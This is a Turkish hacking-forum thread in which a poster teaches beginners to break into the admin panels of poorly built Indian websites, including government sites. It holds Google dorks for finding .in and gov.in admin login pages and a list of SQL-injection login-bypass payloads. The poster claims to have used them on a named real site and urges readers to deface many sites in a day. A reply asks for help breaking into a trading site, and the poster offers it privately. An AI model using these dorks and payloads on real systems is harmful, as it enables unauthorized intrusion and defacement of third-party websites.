Güvenli Ticaret

Hacktivizm içerisinde gerçekleştirmeyi düşündüğünüz tüm ticaretlerde, dikkat ve önlem sahibi olun.

Daha Fazlası

Sorunum Var

Forum içerisinde yaşadığınız tüm sorunlar için sohbet alanını ya da sayfanın altında belirtilen Telegram kanalımızı kullanın.

Daha Fazlası

Doğru Türkçe ve Kurallar

Türkçemizi her bakımdan doğru kullanın ve forum kurallarına uygun paylaşımlar yapmaya özen gösterin.

Daha Fazlası

Çok Kolay Bir Şekilde Rastgele Sitelerin Admin Panellerine Sızmak BY AZAZEL

azazel22

Kayıtlı Üye
Katılım
15 Ocak 2024
Mesajlar
52
Tepkime puanı
69
Konum
adana
İlgi Alanlarınız
Siber Güvenlik
Pentest
C Dilleri Python Html Css Js
Cinsiyet
  1. Erkek

erenkose00

Kayıtlı Üye
Katılım
28 Ocak 2024
Mesajlar
2
Tepkime puanı
0
Konum
İstanbul
İlgi Alanlarınız
Mimarlik
Cinsiyet
  1. Erkek
Merhaba Ben Azazel


Öncelikle Hindistan 2 Milyara yaklaşmaya başlayan nüfusuyla gerçekten büyük bir ülke
Aynı Zamanda Fakir bir Ülke Bu da genel olarak sitelerinin bu fakirsizlikten kaynaklanması nedeniyle çoğu zaman çok ucuz ücretlere yapılıyor bu da başlangıç derecesinde bulunan hackerlara bir fırsat sunuyor.

Kötü kodlanmış site = Zaafiyetli site

Şöyle açıklayayım;
O kadar kötü yapılan siteler var ki 2024 yılına gireceğiz ve artık adını dahi almamamız gereken türden bir açık olan Admin Login bypass Açığın kullanacağız bu konumuzda

http://www.pcsamana.org.in/ şu siteye bir baksanıza
:D


Nadiren görülür ve çok basit bir şekilde exploit edilir.
admin login sayfasında sql payloadları çalıştırırız ve admin olarak o sayfayı, güvenliği atlayıp devam ederiz
bu da bize sitenin adminin genel olarak tüm yetkisini sunar.
peki bu zaafiyetli siteleri nasıl bulacağız?

Tabii ki dorkları kullanarak!


Dorkları kullanarak genel olarak admin login pagelerini ve Hindistanı belirtecek anahtar kelimeleri kullanmamız gerekmekte.

Size Birkaç Dork Yazayım
; inurl:admin.php inurl:.in
inurl:admin.html inurl:.in
inurl:admin inurl:.in
inurl:login/admin inurl:.in
inurl:login/admin inurl:.in İNURL:.İN YERİNE SİTE:.İN DE BAŞARILI SONUÇLAR DÖNDÜRÜR
inurl:admin.asp inurl:.in
inurl:admin.aspx inurl:gov.in
inurl:login/admin.php inurl:gov.in
inurl:login/admin.asp inurl:gov.in
inurl:login/admin.aspx inurl:gov.in

Sadece 10 dakika içerisinde bu dorkları kullanarak
https://www.stet.edu.in/feedback/alumini/admin.php
bu sitenin


''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--

payloadlarını kullanarak admin paneline giriş yaptım

fakat içerisinde herhangi bir dosya yükleyebileceğim ya da herhangi bir site sayfasını değiştirebileceğim bir yer bulunmadığı için es geçiyorum. sizde bu şekilde bir gününüzü ayırarak şanslıysanız 15 20 site düşürebilirsiniz ve bu sitelerden 3 tanesinde upload bölümü bulunsa dahi 3 index demek olucak kısa günün karı

Bu taktik "ilk indeximi basayım aga" diyenler içindi. gelişmek isteyenler bu taktiği kullanmak yerine daha kapsamlı açıkları kullanarak kendilerini bir üst seviyeye taşıyabilirler
Bu ve bunun gibi konuların devamı için konumu beğenirseniz mükemmel olur

AZAZİL SUNAR.
Merhaba bi borsa sitesi gibi kirilmasi kolay biyerde dolandirildim parami cekemiyorum bloke koymuşlar kırabilir misiniz acaba
 

azazel22

Kayıtlı Üye
Katılım
15 Ocak 2024
Mesajlar
52
Tepkime puanı
69
Konum
adana
İlgi Alanlarınız
Siber Güvenlik
Pentest
C Dilleri Python Html Css Js
Cinsiyet
  1. Erkek
Merhaba bi borsa sitesi gibi kirilmasi kolay biyerde dolandirildim parami cekemiyorum bloke koymuşlar kırabilir misiniz acaba
merhaba sizinle dm olarak iletişime geçme adına rootazazel isminde bir insta hesabı açtım oraya yazarsanız yardımcı olurum
 

jak4rr

Kayıtlı Üye
Katılım
18 Ocak 2024
Mesajlar
4,147
Tepkime puanı
17
Konum
Türkiye
İlgi Alanlarınız
bilgisayar korsanlığı, veri sızıntıları
Cinsiyet
  1. Erkek

Karambol

Altın Üye
Katılım
14 Mart 2022
Mesajlar
624
Tepkime puanı
2,291
Konum
.
İlgi Alanlarınız
Siber Güvenlik Ve Hacking
Cinsiyet
  1. Erkek
Eline Sağlık
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst